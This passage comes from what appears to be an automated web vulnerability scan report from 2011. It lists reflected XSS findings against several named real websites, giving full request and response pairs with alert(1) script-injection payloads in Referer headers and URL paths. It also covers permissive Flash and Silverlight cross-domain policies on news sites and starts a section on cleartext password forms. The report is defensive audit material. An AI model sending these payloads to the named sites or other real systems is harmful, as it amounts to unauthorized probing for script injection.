R_HANDLING_URL_PART = "/BYO/ErrorReportingService.svc";
var CLIENT_USER_AGENT = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.106a9f9"-alert(1)-"b61067d8f0";
var CONNECTION_TYPE = "http://";

3.147. http://www.employmentauthority.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.employmentauthority.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b213"><script>alert(1)</script>04714215063 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5b213"><script>alert(1)</script>04714215063

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 86164

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Employment Services, Executive Employment, Executive Search Consultants, Executive Job Openings</title>
<met
...[SNIP]...
<input type="hidden" id="clscandidate_refferalurl" name="clscandidate_refferalurl" value="http://www.google.com/search?hl=en&q=5b213"><script>alert(1)</script>04714215063">
...[SNIP]...

3.148. https://www.lawschoolloans.com/lslprivateloan_application.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.lawschoolloans.com
Path:   /lslprivateloan_application.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79c53'-alert(1)-'09f566a429 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=79c53'-alert(1)-'09f566a429

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:26:04 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=12661fb1a6201f640fe9b1adbc58f535; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29971

<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws_scroll.js"></scr
...[SNIP]...
<script type="text/javascript">
   var submitflag = false;
       
   var page_referrer = 'http://www.google.com/search?hl=en&q=79c53'-alert(1)-'09f566a429';
   var landing_page = 'lslprivateloan_application.php';
   function validateregistration()
   {
       var frm = document.formmain;
       errmsg = "";        
       frm.clsregistration_hdnpage_referrer.value = page_referrer
...[SNIP]...

3.149. http://www.legalauthority.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9df7c"><script>alert(1)</script>a596e96ecab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9df7c"><script>alert(1)</script>a596e96ecab

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=03bo7h1rnmb5ajcrf3d5hmjr85; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=03bo7h1rnmb5ajcrf3d5hmjr85; path=/; domain=.legalauthority.com
Set-Cookie: LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:41 GMT; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 130329

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Legal Resume Consultant, Legal Job Search, Sample Attorney Resume, Legal S
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=9df7c"><script>alert(1)</script>a596e96ecab">
...[SNIP]...

3.150. http://www.legalauthority.com/signup.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b9a"><script>alert(1)</script>58b9969c6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=70b9a"><script>alert(1)</script>58b9969c6e

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=gf3uf2l80p21qgdvt5tkeeshn4; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=gf3uf2l80p21qgdvt5tkeeshn4; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56675

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=70b9a"><script>alert(1)</script>58b9969c6e">
...[SNIP]...

3.151. http://www.legalauthority.com/tmlandingpage.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /tmlandingpage.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5a1a"><script>alert(1)</script>3ecb044851e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /tmlandingpage.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a5a1a"><script>alert(1)</script>3ecb044851e

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:41:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ldenka01g7h9afh3an526c4l36; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=ldenka01g7h9afh3an526c4l36; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56234

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=a5a1a"><script>alert(1)</script>3ecb044851e">
...[SNIP]...

3.152. http://www.toyota.com/mobility/index.html [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /mobility/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf7d"style%3d"x%3aexpression(alert(1))"838c92d8b6a was submitted in the REST URL parameter 1. This input was echoed as ecf7d"style="x:expression(alert(1))"838c92d8b6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /mobilityecf7d"style%3d"x%3aexpression(alert(1))"838c92d8b6a/index.html HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www.toyotamobility.comecf7d"style="x:expression(alert(1))"838c92d8b6a/index.html
Content-Length: 295
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:54:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.toyotamobility.comecf7d"style="x:expression(alert(1))"838c92d8b6a/index.html">
...[SNIP]...

4. Flash cross-domain policy
There are 5 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://www.huffingtonpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Fri, 21 Jan 2011 22:28:28 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

4.2. http://www.msnbc.msn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msnbc.msn.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 23:28:06 GMT
ETag: "fa4f1f651d9bcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 23:39:25 GMT
Content-Length: 3654
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...

4.3. http://www.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 22 Jan 2011 01:23:31 GMT
Content-length: 1169
Content-type: text/xml
Set-cookie: RMID=2d1ea85e6af94d3a31937c53; expires=Sunday, 22-Jan-2012 01:23:31 GMT; path=/; domain=.nytimes.com
Last-modified: Wed, 21 Jul 2010 15:01:34 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

4.4. http://www.politico.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.politico.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Mon, 08 Mar 2010 23:08:26 GMT
ETag: "ffc7c-2cc-24782e80"
Content-Type: text/xml
Cache-Control: max-age=10
Expires: Fri, 21 Jan 2011 23:39:59 GMT
Date: Fri, 21 Jan 2011 23:39:49 GMT
Content-Length: 716
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.politico.com" />
   <allow-access-from domain="*brightcove" />
   <allow-access-from domain="*.brightcove" />
   <allow-access-from domain="*.brightcove.com" />
   <allow-access-from domain="*.politiconetwork.com" />
   <allow-access-from domain="brightcove.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cache.btrll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="admin.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.google-analytics.com"/>
   <allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.5. http://www.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Length: 1507
Content-Type: text/xml
Last-Modified: Mon, 02 Aug 2010 19:50:58 GMT
Accept-Ranges: bytes
ETag: "72574c77c32cb1:1f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 22 Jan 2011 01:23:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...

5. Silverlight cross-domain policy
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://www.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Length: 730
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:44 GMT
Accept-Ranges: bytes
ETag: "3115b4c8f2baca1:1f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 22 Jan 2011 01:23:58 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

5.2. http://www.msnbc.msn.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.msnbc.msn.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Date: Fri, 21 Jan 2011 23:39:25 GMT
Content-Length: 533
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
...[SNIP]...

6. Cleartext submission of password
There are 125 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://www.100kcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100kcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4gi6e55n6c5ims48r8g0gv1692; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
